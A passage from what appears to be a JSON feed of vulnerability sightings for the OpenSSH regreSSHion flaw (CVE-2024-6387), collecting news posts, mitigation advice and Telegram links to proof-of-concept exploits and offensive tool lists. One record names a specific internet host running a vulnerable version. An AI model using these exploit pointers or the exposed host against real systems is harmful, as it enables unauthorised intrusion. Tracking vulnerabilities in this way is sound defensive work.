glibc-based Linux systems are vulnerable. Newer versions are not affected.\n\nWhat to Do?\n\nUpdate OpenSSH: Check your version by running ssh -V in your terminal. If you're using a vulnerable version (8.5p1 to 9.7p1), update immediately.\n\nTemporary Workaround (Use with Caution): Disabling the login grace timeout (setting LoginGraceTime=0 in sshd_config) can mitigate the risk, but be aware it increases susceptibility to denial-of-service attacks.\n\nRecommended Security Enhancement: Install fail2ban to prevent brute-force attacks. This tool automatically bans IPs with too many failed login attempts.\n\nOptional: IP Whitelisting for Increased Security\nOnce you have fail2ban installed, consider allowing only specific IP addresses to access your server via SSH. \n\nThis can be achieved using:\n\nufw for Ubuntu\nfirewalld for AlmaLinux or Rocky Linux\n\nAdditional Resources\n\nOpenSSH Security Page: https://www.openssh.com/security.html\n\nDevSec Hardening Framework - SSH Baseline: https://dev-sec.io/\n\nFail2ban: https://github.com/fail2ban\n\nAbout Fail2ban\n\nFail2ban monitors log files like /var/log/auth.log and bans IPs with excessive failed login attempts. It updates firewall rules to block connections from these IPs for a set duration. Fail2ban is pre-configured to work with common log files and can be easily customized for other logs and errors.\n\nInstallation Instructions\n\nUbuntu: sudo apt install fail2ban\nAlmaLinux/Rocky Linux: sudo dnf install fail2ban\n\n\nAbout DevSec Hardening Framework\n\nThe DevSec Hardening Framework is a set of tools and resources that helps automate the process of securing your server infrastructure. It addresses the challenges of manually hardening servers, which can be complex, error-prone, and time-consuming, especially when managing a large number of servers.\n\nThe framework integrates with popular infrastructure automation tools like Ansible, Chef, and Puppet. It provides pre-configured modules that automatically apply secure settings to your operating systems and services such as OpenSSH, Apache and MySQL. This eliminates the need for manual configuration and reduces the risk of errors.\n\nPrepare by LinuxMalaysia with the help of Google Gemini\n\n5 July 2024\n\n\nVisit my Blog\n\nhttps://blog.harisfazillah.info/2024/07/critical-openssh-vulnerability-cve-2024.html \n\nVisit My Google Doc Web\n\nhttps://docs.google.com/document/d/e/2PACX-1vTSU27PLnDXWKjRJfIcjwh9B0jlSN-tnaO4_eZ_0V5C2oYOPLLblnj3jQOzCKqCwbnqGmpTIE10ZiQo/pub\n\nPerisian Sumber Terbuka Malaysia\n\nhttps://t.me/sumberterbukamalaysia", "creation_timestamp": "2024-07-15T20:47:41.000000Z"}, {"uuid": "ffe90ff5-605c-4aa6-a171-929dad6c3c0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/8Qkk6Q3SDssl1SxyIRBARJe7pxFMS4y-J8W8rDiys4u11LM", "content": "", "creation_timestamp": "2024-11-05T14:07:37.000000Z"}, {"uuid": "fc955018-fd93-4dcc-8cd5-e365705a4639", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "exploited", "source": "https://t.me/information_security_channel/52482", "content": "regreSSHion OpenSSH Flaw: Potential Exploitation Attempts Seen, but Mass Attacks Unlikely\nhttps://www.securityweek.com/regresshion-openssh-flaw-potential-exploitation-attempts-seen-but-mass-attacks-unlikely/\n\nThe critical OpenSSH vulnerability tracked as regreSSHion and CVE-2024-6387 may already be targeted by attackers, but mass exploitation is unlikely.\nThe post regreSSHion OpenSSH Flaw: Potential Exploitation Attempts Seen, but Mass Attacks Unlikely (https://www.securityweek.com/regresshion-openssh-flaw-potential-exploitation-attempts-seen-but-mass-attacks-unlikely/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2024-07-03T12:36:22.000000Z"}, {"uuid": "24ac47c6-6b92-47b6-b0a2-d363b7d05284", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/information_security_channel/52467", "content": "Millions of OpenSSH Servers Potentially Vulnerable to Remote regreSSHion Attack\nhttps://www.securityweek.com/millions-of-openssh-servers-potentially-vulnerable-to-remote-regresshion-attack/\n\nMillions of OpenSSH servers could be vulnerable to unauthenticated remote code execution due to a vulnerability tracked as regreSSHion and CVE-2024-6387.\nThe post Millions of OpenSSH Servers Potentially Vulnerable to Remote regreSSHion Attack (https://www.securityweek.com/millions-of-openssh-servers-potentially-vulnerable-to-remote-regresshion-attack/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2024-07-01T15:58:40.000000Z"}, {"uuid": "fad8b1c3-748b-4914-8395-903d84471640", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/DailyToolz/1180", "content": "https://github.com/ThatNotEasy/CVE-2024-6387", "creation_timestamp": "2024-07-15T21:00:33.000000Z"}, {"uuid": "e04f68b6-5c88-4973-99bd-447759a2050a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/RalfHackerChannel/1505", "content": "\u042d\u0445... \u0434\u0440\u043e\u043f\u043d\u0443\u043b\u0438 \u0441 \u0433\u0438\u0442\u0430 poc\n\n#git #poc #rce", "creation_timestamp": "2024-07-01T14:19:53.000000Z"}, {"uuid": "b98c1c43-a961-4d2e-9def-da0f76d29b2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/RalfHackerChannel/1504", "content": "\ud83d\uddbc\ufe0f RegreSSHion \u2014 OpenSSH Unauthenticated RCE\n\nThe Qualys Threat Research Unit has discovered a Remote Unauthenticated Code Execution vulnerability in OpenSSH\u2019s server (sshd) in glibc-based Linux systems. CVE assigned to this vulnerability is CVE-2024-6387.\n\nThe vulnerability, which is a signal handler race condition in OpenSSH\u2019s server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems.\n\n\ud83d\udd17 Research: \nhttps://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server\n\n\ud83d\udd17 PoC:\nhttps://github.com/7etsuo/cve-2024-6387-poc\n\n#openssh #glibc #rce #cve", "creation_timestamp": "2024-07-01T13:53:30.000000Z"}, {"uuid": "00b4b31c-932f-4b92-8ad7-ff8681234890", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/xzOc5fensx49DU5F1ZlD0m-YRwbD1iXvApiCjyOVmXLmb-o", "content": "", "creation_timestamp": "2024-07-01T21:19:07.000000Z"}, {"uuid": "7e11559e-fc68-4e57-8750-e4db45f0e0f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "exploited", "source": "https://t.me/thehackernews/5229", "content": "\ud83d\udea8 New OpenSSH vulnerability (CVE-2024-6409) found in RHEL 9's versions 8.7p1 & 8.8p1, allowing RCE via race condition in privsep child process. \n \nRead: https://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html \n \n\u26a0\ufe0f Active exploits detected! This bug is distinct from CVE-2024-6387 but shares similarities.", "creation_timestamp": "2024-07-10T05:48:02.000000Z"}, {"uuid": "7d110fe7-c7f9-43e2-8c59-8cb3959cc02b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "exploited", "source": "https://t.me/SecLabNews/15349", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u0437 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e: OpenSSH \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u0440\u0435\u0433\u0440\u0435\u0441\u0441\u0438\u044e\n\n\ud83d\udee1 \u0412 \u0441\u0435\u0440\u0432\u0435\u0440\u043d\u043e\u043c \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 OpenSSH \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-6387 \u0442\u0438\u043f\u0430 Race Condition. \n\n\u26a0\ufe0f \u041e\u0448\u0438\u0431\u043a\u0430, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u0430\u044f \u00abregreSSHion\u00bb, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0440\u0435\u0433\u0440\u0435\u0441\u0441\u0438\u0435\u0439 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 18-\u043b\u0435\u0442\u043d\u0435\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2006-5051. \n \u0423\u0441\u043f\u0435\u0448\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0441 root-\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445. \n\n\u2620\ufe0f \u0412 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043e \u043d\u0435 \u043c\u0435\u043d\u0435\u0435 14 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u043e\u0432 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 OpenSSH, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0447\u0435\u0440\u0435\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442.\n\n #\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c #OpenSSH @SecLabNews", "creation_timestamp": "2024-07-01T16:57:23.000000Z"}, {"uuid": "3731713c-e4a9-4805-8a68-549dae3e7e99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/xakep_ru/16039", "content": "\u041c\u0438\u043b\u043b\u0438\u043e\u043d\u0430\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 OpenSSH \u0443\u0433\u0440\u043e\u0436\u0430\u0435\u0442 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 regreSSHion\n\n\u041c\u0438\u043b\u043b\u0438\u043e\u043d\u044b \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 OpenSSH \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u043f\u0435\u0440\u0435\u0434 \u0441\u0432\u0435\u0436\u0435\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043e\u0439 regreSSHion (CVE-2024-6387), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430.\n\nhttps://xakep.ru/2024/07/01/regresshion/", "creation_timestamp": "2024-07-01T19:09:09.000000Z"}, {"uuid": "be91ef74-6716-447b-a2cb-5635f3bf6f8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/xakep_ru/16110", "content": "\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 regreSSHion\n\n\u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-6387 (regreSSHion) \u0432 OpenSSH \u0431\u044b\u043b\u0430 \u043d\u0430\u0439\u0434\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430.\n\nhttps://xakep.ru/2024/07/16/cve-2024-6409/", "creation_timestamp": "2024-07-16T21:22:30.000000Z"}, {"uuid": "ef167085-d349-4c1e-91ae-56e50bff4331", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/25200", "content": "Tools - Hackers Factory\n\nGitHub - edoardottt/csprecon: Discover new target domains using Content Security Policy\n\nhttps://github.com/edoardottt/csprecon\n\nOSED Material (Offensive Security Exploit Developer) \n\nhttps://github.com/epi052/osed-scripts\n\nhttps://github.com/nop-tech/OSED\n\nExploitation-course OSED\n\nhttps://github.com/ashemery/exploitation-course\n\nGitHub - classvsoftware/spy-extension: A Chrome extension that will steal literally everything it can.\n\nhttps://github.com/classvsoftware/spy-extension\n\nA signal handler race condition in OpenSSH's server (sshd)\n\nhttps://github.com/zgzhang/cve-2024-6387-poc\n\nGitHub - blackhillsinfosec/skyhook: A round-trip obfuscated HTTP file transfer setup built to bypass IDS detections.\n\nhttps://github.com/blackhillsinfosec/skyhook\n\nRed-Team-Management/Red Team Courses\n\nhttps://github.com/CyberSecurityUP/Red-Team-Management/blob/main/Red%20Team%20Courses.md\n\nA CVE-2021-34527 (a.k.a PrintNightmare) Python Scanner\n\nhttps://github.com/byt3bl33d3r/ItWasAllADream\n\nDOME: A subdomain enumeration tool\n\nDownload: github.com/v4d1/Dome\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-03T12:09:51.000000Z"}, {"uuid": "750679d2-a083-471f-b6fc-54bcd6a99941", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/cultofwire/1302", "content": "regreSSHion: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server\n\nQualys \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 OpenSSH, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0443\u044e \u0434\u043e\u0431\u0438\u0442\u044c\u0441\u044f RCE \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0436\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043a\u043e\u0434\u043e\u0432\u043e\u0435 \u0438\u043c\u044f regreSSHion \u0438 \u0421VE: CVE-2024-6387\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u043e\u0442 8.5p1 \u0434\u043e 9.8p1. \n\u0421\u0438\u0441\u0442\u0435\u043c\u044b OpenBSD \u043d\u0435 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b, \u0442\u0430\u043a \u043a\u0430\u043a \u0432 2001 \u0433\u043e\u0434\u0443 OpenBSD \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0439 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c, \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0430\u044e\u0449\u0438\u0439 \u044d\u0442\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c.\n\n\u041f\u0430\u0442\u0447 \u0443\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438, \u0436\u0434\u0435\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 -  Debian, Ubuntu, RHEL, Fedora, SUSE/openSUSE, Arch.\n\n\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0439 workaround:\n\u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 \"LoginGraceTime=0\" \u0432 sshd_config.\n\n\u041d\u043e \u0435\u0441\u0442\u044c \u0438 \u043c\u0438\u043d\u0443\u0441\u044b: \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u0442\u0430\u0439\u043c\u0430\u0443\u0442\u0430 \u0443\u043f\u0440\u043e\u0441\u0442\u0438\u0442 DoS \u043f\u0440\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u0431\u043e\u043b\u044c\u0448\u043e\u0433\u043e \u0447\u0438\u0441\u043b\u0430 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0439, \u043f\u0440\u0435\u0432\u044b\u0448\u0430\u044e\u0449\u0438\u0445 \u043b\u0438\u043c\u0438\u0442\u044b, \u0437\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u0447\u0435\u0440\u0435\u0437 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 MaxStartups.\n\nQualys \u0442\u0430\u043a \u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, PoC \u0443\u0436\u0435 \u0435\u0441\u0442\u044c.", "creation_timestamp": "2024-07-01T14:10:36.000000Z"}, {"uuid": "a4ef485b-1b31-4cd5-a3fb-e61bec8f50cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/25236", "content": "Tools - Hackers Factory\n\nGitHub - EvilBytecode/Bloxstrap-Persistance: Bloxstrap-Persistance modifies Bloxstrap's settings (Settings.json) to add persistent integrations, showcasing how applications can be exploited.\n\nhttps://github.com/EvilBytecode/Bloxstrap-Persistance\n\nGitHub - techgaun/github-dorks: Find leaked secrets via github search\n\nhttps://github.com/techgaun/github-dorks\n\nGitHub - lachlan2k/phatcrack: Modern web-based distributed hashcracking solution, built on hashcat\n\nhttps://github.com/lachlan2k/phatcrack\n\nGitHub - MatheuZSecurity/ModTracer: ModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\nGitHub - omrikiei/ktunnel: A cli that exposes your local resources to kubernetes\n\nhttps://github.com/omrikiei/ktunnel\n\nGitHub - BrandonLynch2402/cve-2024-6387-nuclei-template\n\nhttps://github.com/BrandonLynch2402/cve-2024-6387-nuclei-template\n\nGitHub - D3Ext/WEF: Wi-Fi Exploitation Framework\n\nhttps://github.com/D3Ext/WEF\n\nGitHub - spyboy-productions/omnisci3nt: Unveiling the Hidden Layers of the Web \u2013 A Comprehensive Web Reconnaissance Tool\n\nhttps://github.com/spyboy-productions/omnisci3nt\n\nGitHub - WerWolv/ImHex: \ud83d\udd0d A Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM.\n\nhttps://github.com/WerWolv/ImHex\n\nGitHub - edoardottt/csprecon: Discover new target domains using Content Security Policy\n\nhttps://github.com/edoardottt/csprecon\n\nGitHub - classvsoftware/spy-extension: A Chrome extension that will steal literally everything it can\n\nhttps://github.com/classvsoftware/spy-extension\n\n#CyberDilara\nhttps://t.me/CyberDilara\n\n#CyberBulletin\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-07-06T08:37:40.000000Z"}, {"uuid": "2fff34dd-8a7f-47c7-955d-2371fd4c5ac6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/DXPLOIT0/298", "content": "[VULNERABILITY] : CVE-2024-6387 {openssh}\n43.134.59.194\nAsia Pacific Network Information Center, Pty. Ltd.\nSingaporeSingapore, Singapore\nSSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10\nKey type: ecdsa-sha2-nistp256\nKey: AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGD4cQkAvcbFnX71mbkyTeaY\nXWm+kxKl2+nb3RuHKfsD3hyPLnx5uuBcWJiDipWC4EZccsFic+N0QqohWS1DLL8=\nFingerprint: e1:2d:eb:32:30:93:0d:19:0e:3f:5c:81:f1:ac:65:ab", "creation_timestamp": "2024-10-13T16:50:25.000000Z"}, {"uuid": "3f649017-1e5b-4a6d-9a15-df8c0774c8b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/25207", "content": "Tools - Hackers Factory\n\nA signal handler race condition in OpenSSH's server (sshd)\n\nhttps://github.com/zgzhang/cve-2024-6387-poc\n\nPrivilege Escalation Enumeration Script for Windows\n\nhttps://github.com/itm4n/PrivescCheck\n\nTwo new offensive techniques using Windows Fibers: PoisonFiber (The first remote enumeration & Fiber injection capability POC tool) PhantomThread (An evolved callstack-masking implementation)\n\nhttps://github.com/JanielDary/ImmoralFiber\n\nStatic deobfuscator for Themida/WinLicense/Code Virtualizer's mutation-based obfuscation.\n\nhttps://github.com/ergrelet/themida-unmutate\n\nExample code samples from our ScriptBlock Smuggling Blog post\n\nhttps://github.com/BC-SECURITY/ScriptBlock-Smuggling\n\nRusty Hypervisor - Windows UEFI Blue Pill Type-1 Hypervisor in Rust (Codename: Illusion)\n\nhttps://github.com/memN0ps/illusion-rs\n\nThis Burp Suite extension allows you to copy HTTP requests without including cookies or tokens. It removes sensitive information related to authentication, session management, and CSRF protection from the requests, making it easier to share or analyze them without exposing sensitive data.\n\nhttps://github.com/haticeerturk/requestCleaner\n\nGitHub - pl4int3xt/cve_2024_0044: CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13 -\n\nhttps://github.com/pl4int3xt/cve_2024_0044\n\nZyxel NAS326 firmware < V5.21(AAZF.17)C0 - Command Injection CVE-2024-29973\n\nhttps://github.com/momika233/CVE-2024-29973\n\nSudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing advanced automated reconnaissance (framework). This tool can also be used for OSINT (Open-source intelligence) activities.\n\nhttps://github.com/screetsec/Sudomy\n\n#CyberDilara\nhttps://t.me/CyberDilara\n\n#CyberBulletin\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-07-04T09:50:35.000000Z"}, {"uuid": "cfd76c0d-00ab-4cb0-91c0-e8c258c87fc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2745", "content": "https://packetstormsecurity.com/files/179290/OpenSSH-Server-regreSSHion-Remote-Code-Execution.html\n\nOpenSSH Server regreSSHion Remote Code Execution\ncve-2024-6387\n#poc", "creation_timestamp": "2024-07-02T12:02:28.000000Z"}, {"uuid": "41136f00-6c84-46da-b15f-f0d553f2b668", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2747", "content": "https://github.com/zgzhang/cve-2024-6387-poc\n\nCVE-2024-6387_Check\n#github", "creation_timestamp": "2024-07-02T15:05:56.000000Z"}, {"uuid": "a31d3e5b-caab-4d23-b263-a2779a79f27b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/club31337/2275", "content": "https://github.com/lflare/cve-2024-6387-poc\n\n\u269c\ufe0f @club1337", "creation_timestamp": "2024-11-11T02:29:00.000000Z"}, {"uuid": "36700264-7e8a-4f14-af7e-c4094cc17a91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10770", "content": "#exploit\nCVE-2024-6387:\nregreSSHion: Remote Unauthenticated Code Execution in OpenSSH server\n]-> https://packetstormsecurity.com/files/179290/OpenSSH-Server-regreSSHion-Remote-Code-Execution.html\n]-> check: https://github.com/zgzhang/cve-2024-6387-poc", "creation_timestamp": "2024-07-03T13:36:28.000000Z"}, {"uuid": "871b2b5b-48f9-4f88-bce0-e44d6c225e17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/JZzPjcgvljE0UHseNdzwP_TgEfJruUZ1uMeHTMVeomZZGsI", "content": "", "creation_timestamp": "2024-07-02T16:30:30.000000Z"}, {"uuid": "2b91da44-70b3-4513-be66-9fe66330afd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "exploited", "source": "Telegram/eI9GRLtDSzj15iEKUYrDnOztFNeWHQi8zGkt_3EQW9J0vGI", "content": "", "creation_timestamp": "2024-07-08T16:04:04.000000Z"}, {"uuid": "f93d01f8-5c53-4870-ad47-001f60354290", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/-DTQksLeIprcQrqq2wzKiIjXKlVDV3SrzMWUbMb1itGQPt4", "content": "", "creation_timestamp": "2024-07-01T19:16:38.000000Z"}, {"uuid": "84cbb9de-3513-4afb-9e9b-f6326d31575a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/ck2EFexYmgMBc1NumsP957CWTbmGsMW3e66g_x_PGNMFq90", "content": "", "creation_timestamp": "2024-07-01T20:27:06.000000Z"}, {"uuid": "e7130eab-5e9f-41f8-829d-3833e7e1605c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": 